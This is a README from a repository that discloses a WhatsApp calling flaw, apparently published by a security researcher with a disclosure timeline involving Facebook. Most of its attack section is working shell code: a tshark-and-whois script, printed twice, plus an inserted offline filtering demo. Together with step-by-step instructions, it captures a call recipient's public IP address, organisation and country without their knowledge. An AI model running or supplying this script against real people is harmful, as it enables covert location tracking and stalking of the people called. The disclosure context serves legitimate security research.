/LICENSE:
--------------------------------------------------------------------------------
Source code in this repository is covered by the Server Side Public License, v 1.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
## Leak the IP address and Geolocation of target whatsapp user

### Disclaimer

This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that I (bhdresh) am not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (data loss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility.

Finally, this is a personal development, please respect its philosophy and don't use it for bad things!

### Description/Impact

#### PoC Video:

https://vimeo.com/577355374

#### Complete Details

At the time of writing, the latest version of the WhatsApp application on every platform except the web client discloses the public IP address of the remote user to the caller during a call.

During a WhatsApp voice or video call, the application on the caller's side attempts to set up a direct connection to the public IP address of the recipient's device. The other UDP destinations seen during the call are Facebook/WhatsApp servers; these can be identified (for example from the registrant named in their whois records) and excluded. The public destination that remains is the recipient's real public IP address, obtained without the recipient's knowledge. The address observed is whatever the recipient's network presents to the Internet: a recipient who calls through a VPN exposes only the VPN egress address, which is the mitigation Facebook suggested in the disclosure timeline.
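The two-phase filtering described above (learn the server addresses from a reference call, then drop private ranges and known servers from the target call) as an added example; this is not bhdresh's PoC and it does not capture anything. It works on constructed address lists in the one-IP-per-line form that `tshark -T fields -e ip.dst` prints, so the logic can be checked offline. The addresses are assumptions from the documentation ranges: 198.51.100.10 and 198.51.100.11 stand in for WhatsApp servers and 203.0.113.77 for the callee.

```sh
#!/bin/sh
# Added example, not the repository's PoC: the address-filtering step done
# offline on constructed destination lists instead of a live tshark capture.

# Returns 0 when the address is in an RFC 1918 range (10/8, 172.16/12, 192.168/16).
is_private() {
    case "$1" in
        10.*) return 0 ;;
        192.168.*) return 0 ;;
        172.*)
            second=$(printf '%s' "$1" | cut -d. -f2)
            [ "$second" -ge 16 ] && [ "$second" -le 31 ] && return 0
            ;;
    esac
    return 1
}

# Phase 1: every public destination seen during the reference call is a server.
# Reads IPs on stdin, prints the unique public ones.
learn_servers() {
    sort -u | while read -r ip; do
        [ -n "$ip" ] || continue
        is_private "$ip" || printf '%s\n' "$ip"
    done
}

# Builds the single tshark display filter (private ranges plus learned servers)
# that the target-call capture would be run with.
build_filter() {
    f='ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12'
    for ip in "$@"; do
        f="$f and ip.dst!=$ip"
    done
    printf '%s\n' "$f"
}

# Phase 2: destinations of the target call minus private ranges and the servers
# listed in the file given as $1. Reads IPs on stdin, prints the candidates.
candidates() {
    sort -u | while read -r ip; do
        [ -n "$ip" ] || continue
        is_private "$ip" && continue
        grep -qxF "$ip" "$1" || printf '%s\n' "$ip"
    done
}

demo() {
    ref=$(mktemp); tgt=$(mktemp); srv=$(mktemp)
    # Constructed packet lists (documentation addresses), not a real capture:
    # the hotspot gateway, two "server" addresses, and one callee address.
    printf '%s\n' 192.168.43.1 198.51.100.10 198.51.100.11 198.51.100.10 > "$ref"
    printf '%s\n' 192.168.43.1 198.51.100.10 10.0.0.5 203.0.113.77 198.51.100.11 > "$tgt"
    learn_servers < "$ref" > "$srv"
    echo "display filter: $(build_filter $(cat "$srv"))"
    echo "candidate callee addresses:"
    candidates "$srv" < "$tgt"
    rm -f "$ref" "$tgt" "$srv"
}

demo
```

The same split is what makes the live PoC work: the reference call has to be made to a number other than the target, otherwise the target's own address is learned as a "server" and filtered out of the second capture.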
Following is a quick script to exploit this vulnerability. It runs on the machine that routes the attacker phone's traffic (see Repro Steps); the capture interface is the first argument and defaults to eth0. The reference call learns the server addresses, and they are folded together with the private-range exclusions into a single display filter, because tshark honours only the last `-Y` it is given.

```sh
#!/bin/sh
# Usage: ./poc.sh [interface]   (defaults to eth0; use the interface that
# carries the attacker phone's traffic)
IFACE="${1:-eth0}"
PRIV='ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12'

# Phase 1: reference call. Every public UDP destination seen in the first 100
# packets while calling a non-target number is a WhatsApp/Facebook server.
echo "Call any WhatsApp user (not the target) now to learn the server addresses."
servers=$(tshark -i "$IFACE" -T fields -f "udp" -e ip.dst -Y "$PRIV" -c 100 | sort -u)

# Fold the learned servers into one display filter. tshark keeps only the last
# -Y, so server and private-range exclusions must be a single expression.
filter="$PRIV"
for ip in $servers; do
    filter="$filter and ip.dst!=$ip"
done

echo "Press Enter and call your target."
read -r dummy

# Phase 2: target call. Anything that is neither private nor a known server is
# the callee. Each address is looked up once; whois output naming Facebook or
# Google is treated as infrastructure the reference call did not cover.
tmp=$(mktemp)
seen=" "
tshark -i "$IFACE" -l -T fields -f "udp" -e ip.dst -Y "$filter" | while read -r dst; do
    [ -n "$dst" ] || continue                       # IPv6 packets have no ip.dst
    case "$seen" in *" $dst "*) continue ;; esac
    seen="$seen$dst "
    whois "$dst" > "$tmp" 2>/dev/null
    if ! grep -qiE 'facebook|google' "$tmp"; then
        targetinfo=$(grep -iwE 'OrgName:|NetName:|Country:' "$tmp" | xargs)
        echo "$dst --- $targetinfo"
    fi
done
rm -f "$tmp"
```

#### Impact

Mapping a WhatsApp user to their public IP address does not only reveal the user's approximate location; by keeping a history of the addresses observed over time, it can also be misused to track their physical movements. The same user-to-IP mapping can be misused to track the user's browsing habits and to influence them.

Further, the public IP could be used to launch targeted attacks against the WhatsApp user's home or office network.

### Repro Steps

#### Setup

Users: UserA has the WhatsApp contact details of UserB

Environment: n/a

Browser: n/a

App version: <= latest version of the WhatsApp application on any platform

OS: All platforms except web

Description: UserA makes a WhatsApp call to UserB and captures UserB's public IP information without UserB's knowledge.
Video PoC for better understanding of steps: https://vimeo.com/577355374

#### Steps

Step 1: Start a WiFi hotspot on the attacker machine and connect the attacker phone to the attacker SSID, so that all of the phone's traffic passes through the attacker machine

Step 2: Start the PoC script (below) on the attacker machine, which is now acting as a router for the attacker phone; pass the interface that carries the phone's traffic as the first argument if it is not eth0

```sh
#!/bin/sh
# Usage: ./poc.sh [interface]   (defaults to eth0; use the interface that
# carries the attacker phone's traffic)
IFACE="${1:-eth0}"
PRIV='ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12'

# Phase 1: reference call. Every public UDP destination seen in the first 100
# packets while calling a non-target number is a WhatsApp/Facebook server.
echo "Call any WhatsApp user (not the target) now to learn the server addresses."
servers=$(tshark -i "$IFACE" -T fields -f "udp" -e ip.dst -Y "$PRIV" -c 100 | sort -u)

# Fold the learned servers into one display filter. tshark keeps only the last
# -Y, so server and private-range exclusions must be a single expression.
filter="$PRIV"
for ip in $servers; do
    filter="$filter and ip.dst!=$ip"
done

echo "Press Enter and call your target."
read -r dummy

# Phase 2: target call. Anything that is neither private nor a known server is
# the callee. Each address is looked up once; whois output naming Facebook or
# Google is treated as infrastructure the reference call did not cover.
tmp=$(mktemp)
seen=" "
tshark -i "$IFACE" -l -T fields -f "udp" -e ip.dst -Y "$filter" | while read -r dst; do
    [ -n "$dst" ] || continue                       # IPv6 packets have no ip.dst
    case "$seen" in *" $dst "*) continue ;; esac
    seen="$seen$dst "
    whois "$dst" > "$tmp" 2>/dev/null
    if ! grep -qiE 'facebook|google' "$tmp"; then
        targetinfo=$(grep -iwE 'OrgName:|NetName:|Country:' "$tmp" | xargs)
        echo "$dst --- $targetinfo"
    fi
done
rm -f "$tmp"
```

Step 3: Call any WhatsApp user other than the target to capture the server IP addresses to filter; the script records them once 100 UDP packets have been seen

Step 4: Press Enter, then call the victim on WhatsApp

Step 5: Disconnect the call once it is established

Step 6: The script prints the public IP address of the target together with the organisation, network name and country from its whois record

Step 7: Validate the result by comparing it with the public IP address as seen from the target phone

### Disclosure timeline

1) October 14, 2020 - Reported vulnerability to Facebook
2) October 14, 2020 - Response from Facebook (Thank you for your report. In this case, the issue you've described is actually just intended functionality and therefore doesn't qualify for a bounty.)
3) October 14, 2020 - Reply to Facebook (could you please let me know how WhatsApp users could mitigate this accidental disclosure of their IP and potential private information about their location?)
4) October 16, 2020 - Follow up email
5) October 20, 2020 - Response from Facebook (Due to the nature of the peer to peer protocol, the best methods for users who may be concerned about accidental disclosure is to take a proactive approach. This can include limiting calls to trusted users or using a VPN.)
6) January 18, 2021 - Requesting permission for public disclosure (In such a case, is it fine if I publish this finding with public disclosure?)
7) January 18, 2021 - Response from Facebook (The decision to publish is entirely yours. There are no penalties for doing so.)
8) March 20, 2021 - Further communication with Facebook (During my research I have noticed that Signal has introduced a feature to relay calls through the Signal server to avoid revealing IP addresses.... Could you please recheck the approach to limit calls to trusted users or using a VPN? I believe using a VPN all the time is not a feasible solution to protect the location privacy.)
9) March 23, 2021 - Response from Facebook (At this time we are content with our current implementation of WhatsApp calling.)
10) July 03, 2021 - Public disclosure
--------------------------------------------------------------------------------